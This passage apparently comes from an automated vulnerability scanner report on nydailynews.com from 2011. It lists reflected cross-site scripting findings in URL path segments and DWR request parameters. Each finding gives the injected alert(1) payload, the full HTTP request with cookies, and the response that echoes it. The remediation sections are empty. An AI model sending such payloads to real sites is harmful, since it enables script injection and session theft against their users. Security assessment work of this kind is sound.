User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; Zvents=ujkx1w2rt6; zvents_tracker_sid=13131021502530.22701324033550918; fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8M8Ys88Y|8M8M8Ys88Y|8M8M8Ys88Y|M|8M8M8Ys88Y|8M8M8Ys88Y; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:45:38 GMT
Server: Apache
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69836

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
Query.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/news/national/2011/08/11ab767';alert(1)//079ca41f4fb/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html';
}
//-->
...[SNIP]...

4.203. http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38297'%3balert(1)//65f5d667c36 was submitted in the REST URL parameter 6. This input was echoed as 38297';alert(1)//65f5d667c36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html38297'%3balert(1)//65f5d667c36 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/news/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; Zvents=ujkx1w2rt6; zvents_tracker_sid=13131021502530.22701324033550918; fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8M8Ys88Y|8M8M8Ys88Y|8M8M8Ys88Y|M|8M8M8Ys88Y|8M8M8Ys88Y; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/news/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.3.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:45:49 GMT
Server: Apache
Keep-Alive: timeout=3, max=989
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69836

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
/www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/news/national/2011/08/11/2011-08-11_charla_nash_woman_disfigured_in_chimp_attack_reveals_new_face_after_20hour_trans.html38297';alert(1)//65f5d667c36';
}
//-->
...[SNIP]...

4.204. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e1c3'%3balert(1)//e4208c355d3db111b was submitted in the REST URL parameter 1. This input was echoed as 1e1c3';alert(1)//e4208c355d3db111b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /nydn1e1c3'%3balert(1)//e4208c355d3db111b/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1&page=/index.html&httpSessionId=&scriptSessionId=89D19EC3307EBE016A284A113953A718803&c0-scriptName=mostPopularStories&c0-methodName=getMostPopularStoriesLists&c0-id=0&c0-param0=string:%2F&batchId=0 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Origin: http://www.nydailynews.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; fpc1000563892833=MtYkkj3J|WW003trLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8soM1H0s|8M8soM1H0s|8M8soM1H0s|s|8M8soM1H0s|8M8soM1H0s; Zvents=ujkx1w2rt6; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zvents_tracker_sid=13131021502530.22701324033550918

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:39:01 GMT
Server: Apache
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69794

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
{
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/nydn1e1c3';alert(1)//e4208c355d3db111b/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr';
}
//-->
...[SNIP]...

4.205. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [batchId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr

Issue detail

The value of the batchId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65da6'-alert(1)-'f485ca4e6a8f11a8d was submitted in the batchId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1&page=/index.html&httpSessionId=&scriptSessionId=89D19EC3307EBE016A284A113953A718803&c0-scriptName=mostPopularStories&c0-methodName=getMostPopularStoriesLists&c0-id=0&c0-param0=string:%2F&batchId=065da6'-alert(1)-'f485ca4e6a8f11a8d HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Origin: http://www.nydailynews.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; fpc1000563892833=MtYkkj3J|WW003trLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8soM1H0s|8M8soM1H0s|8M8soM1H0s|s|8M8soM1H0s|8M8soM1H0s; Zvents=ujkx1w2rt6; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zvents_tracker_sid=13131021502530.22701324033550918

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/plain;charset=ISO-8859-1
Date: Thu, 11 Aug 2011 22:46:08 GMT
Age: 0
Via: AX-CACHE-2.4:20
Vary: Accept-encoding
Content-Length: 2495

//#DWR-INSERT
//#DWR-REPLY
var s0={};var s1={};var s2={};var s3={};var s4={};var s5={};var s6={};var s7={};var s8={};var s9={};s0.headline="Vile defense against sex harassment lawsuit: She's too u
...[SNIP]...
re Are They Now?";s9.url="http://www.nydailynews.com/entertainment/movies/galleries/beverly_hills_cop_where_are_they_now/beverly_hills_cop_where_are_they_now.html";
dwr.engine._remoteHandleCallback('065da6'-alert(1)-'f485ca4e6a8f11a8d','0',[s0,s1,s2,s3,s4,s5,s6,s7,s8,s9]);

4.206. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [c0-id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr

Issue detail

The value of the c0-id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2701'-alert(1)-'51301dabb52a6555 was submitted in the c0-id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1&page=/index.html&httpSessionId=&scriptSessionId=89D19EC3307EBE016A284A113953A718803&c0-scriptName=mostPopularStories&c0-methodName=getMostPopularStoriesLists&c0-id=0f2701'-alert(1)-'51301dabb52a6555&c0-param0=string:%2F&batchId=0 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Origin: http://www.nydailynews.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; fpc1000563892833=MtYkkj3J|WW003trLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8soM1H0s|8M8soM1H0s|8M8soM1H0s|s|8M8soM1H0s|8M8soM1H0s; Zvents=ujkx1w2rt6; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zvents_tracker_sid=13131021502530.22701324033550918

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/plain;charset=ISO-8859-1
Date: Thu, 11 Aug 2011 22:45:57 GMT
Age: 0
Via: AX-CACHE-2.4:20
Vary: Accept-encoding
Content-Length: 2494

//#DWR-INSERT
//#DWR-REPLY
var s0={};var s1={};var s2={};var s3={};var s4={};var s5={};var s6={};var s7={};var s8={};var s9={};s0.headline="Vile defense against sex harassment lawsuit: She's too u
...[SNIP]...
re They Now?";s9.url="http://www.nydailynews.com/entertainment/movies/galleries/beverly_hills_cop_where_are_they_now/beverly_hills_cop_where_are_they_now.html";
dwr.engine._remoteHandleCallback('0','0f2701'-alert(1)-'51301dabb52a6555',[s0,s1,s2,s3,s4,s5,s6,s7,s8,s9]);

4.207. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [c0-methodName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr

Issue detail

The value of the c0-methodName request parameter is copied into the HTML document as plain text between tags. The payload 82732<script>alert(1)</script>c32ba96e3f17ced29 was submitted in the c0-methodName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1&page=/index.html&httpSessionId=&scriptSessionId=89D19EC3307EBE016A284A113953A718803&c0-scriptName=mostPopularStories&c0-methodName=getMostPopularStoriesLists82732<script>alert(1)</script>c32ba96e3f17ced29&c0-id=0&c0-param0=string:%2F&batchId=0 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Origin: http://www.nydailynews.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; fpc1000563892833=MtYkkj3J|WW003trLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8soM1H0s|8M8soM1H0s|8M8soM1H0s|s|8M8soM1H0s|8M8soM1H0s; Zvents=ujkx1w2rt6; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zvents_tracker_sid=13131021502530.22701324033550918

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 286
Date: Thu, 11 Aug 2011 22:45:41 GMT
Age: 0
Via: AX-CACHE-2.4:20

//#DWR-INSERT
//#DWR-REPLY
dwr.engine._remoteHandleException('0','0',{cause:null,javaClassName:"java.lang.IllegalArgumentException",message:"Missing method or missing parameter converters: mostPopularStories.getMostPopularStoriesLists82732<script>alert(1)</script>c32ba96e3f17ced29"});

4.208. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [c0-scriptName parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr

Issue detail

The value of the c0-scriptName request parameter is copied into the HTML document as plain text between tags. The payload c04a1<script>alert(1)</script>01f351e2c7684ef21 was submitted in the c0-scriptName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1&page=/index.html&httpSessionId=&scriptSessionId=89D19EC3307EBE016A284A113953A718803&c0-scriptName=mostPopularStoriesc04a1<script>alert(1)</script>01f351e2c7684ef21&c0-methodName=getMostPopularStoriesLists&c0-id=0&c0-param0=string:%2F&batchId=0 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Origin: http://www.nydailynews.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; fpc1000563892833=MtYkkj3J|WW003trLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8soM1H0s|8M8soM1H0s|8M8soM1H0s|s|8M8soM1H0s|8M8soM1H0s; Zvents=ujkx1w2rt6; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zvents_tracker_sid=13131021502530.22701324033550918

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/plain;charset=ISO-8859-1
Date: Thu, 11 Aug 2011 22:45:36 GMT
Age: 0
Via: AX-CACHE-2.4:20
Vary: Accept-encoding
Content-Length: 434

//#DWR-REPLY
if (window.dwr) dwr.engine._remoteHandleBatchException({ name:'java.lang.SecurityException', message:'No class by name: mostPopularStoriesc04a1<script>alert(1)</script>01f351e2c7684ef21' }, '0');
else if (window.parent.dwr) window.parent.dwr.engine._remoteHandleBatchException({ name:'java.lang.SecurityException', message:'No class by name: mostPopularStoriesc04a1<script>
...[SNIP]...

4.209. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [callCount parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr

Issue detail

The value of the callCount request parameter is copied into the HTML document as plain text between tags. The payload 64b78<script>alert(1)</script>0327368a54ef65d92 was submitted in the callCount parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=164b78<script>alert(1)</script>0327368a54ef65d92&page=/index.html&httpSessionId=&scriptSessionId=89D19EC3307EBE016A284A113953A718803&c0-scriptName=mostPopularStories&c0-methodName=getMostPopularStoriesLists&c0-id=0&c0-param0=string:%2F&batchId=0 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
Origin: http://www.nydailynews.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; fpc1000563892833=MtYkkj3J|WW003trLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8soM1H0s|8M8soM1H0s|8M8soM1H0s|s|8M8soM1H0s|8M8soM1H0s; Zvents=ujkx1w2rt6; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zvents_tracker_sid=13131021502530.22701324033550918

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/plain;charset=ISO-8859-1
Date: Thu, 11 Aug 2011 22:45:29 GMT
Age: 0
Via: AX-CACHE-2.4:20
Vary: Accept-encoding
Content-Length: 472

//#DWR-REPLY
if (window.dwr) dwr.engine._remoteHandleBatchException({ name:'org.directwebremoting.extend.ServerException', message:'The specified call count is not a number: 164b78<script>alert(1)</script>0327368a54ef65d92' });
else if (window.parent.dwr) window.parent.dwr.engine._remoteHandleBatchException({ name:'org.directwebremoting.extend.ServerException', message:'The specified call count is not a number: 164b78<
...[SNIP]...

4.210. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c1c5'%3balert(1)//7b24542dda8 was submitted in the REST URL parameter 1. This input was echoed as 4c1c5';alert(1)//7b24542dda8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /sports4c1c5'%3balert(1)//7b24542dda8/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/sports/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-824525508-1312767406537; Zvents=ujkx1w2rt6; zvents_tracker_sid=13131021502530.22701324033550918; fpc1000563892833=MtYkkj3J|aLQx8WrLaa|fses1000563892833=|Qqv6AmrLaa|MtYkkj3J|fvis1000563892833=Zj1odHRwJTNBJTJGJTJGd3d3Lm55ZGFpbHluZXdzLmNvbSUyRmluZGV4Lmh0bWwmYj1OZXclMjBZb3JrJTIwTmV3cyUyQyUyMFRyYWZmaWMlMkMlMjBTcG9ydHMlMkMlMjBXZWF0aGVyJTJDJTIwUGhvdG9zJTJDJTIwRW50ZXJ0YWlubWVudCUyQyUyMGFuZCUyMEdvc3NpcCUyMC0lMjBOWSUyMERhaWx5JTIwTmV3cw==|8M8M8Ys88Y|8M8M8Ys88Y|8M8M8Ys88Y|M|8M8M8Ys88Y|8M8M8Ys88Y; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/sports/index.html; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.5.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __vry=0

Response

HTTP/1.1 404 Not Found
Date: Thu, 11 Aug 2011 22:46:12 GMT
Server: Apache
Keep-Alive: timeout=3, max=995
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Vary: Accept-encoding
Content-Length: 69846

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 7 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/sports4c1c5';alert(1)//7b24542dda8/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html';
}
//-->
...[SNIP]...

4.211. http://www.nydailynews.com/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.nydailynews.com
Path:	/sports/baseball/yankees/2011/08/11/2011-08-11_yankees_can_pound_the_als_least_but_bombers__cc_sabathia_need_to_prove_they_can_.html

Issue detail

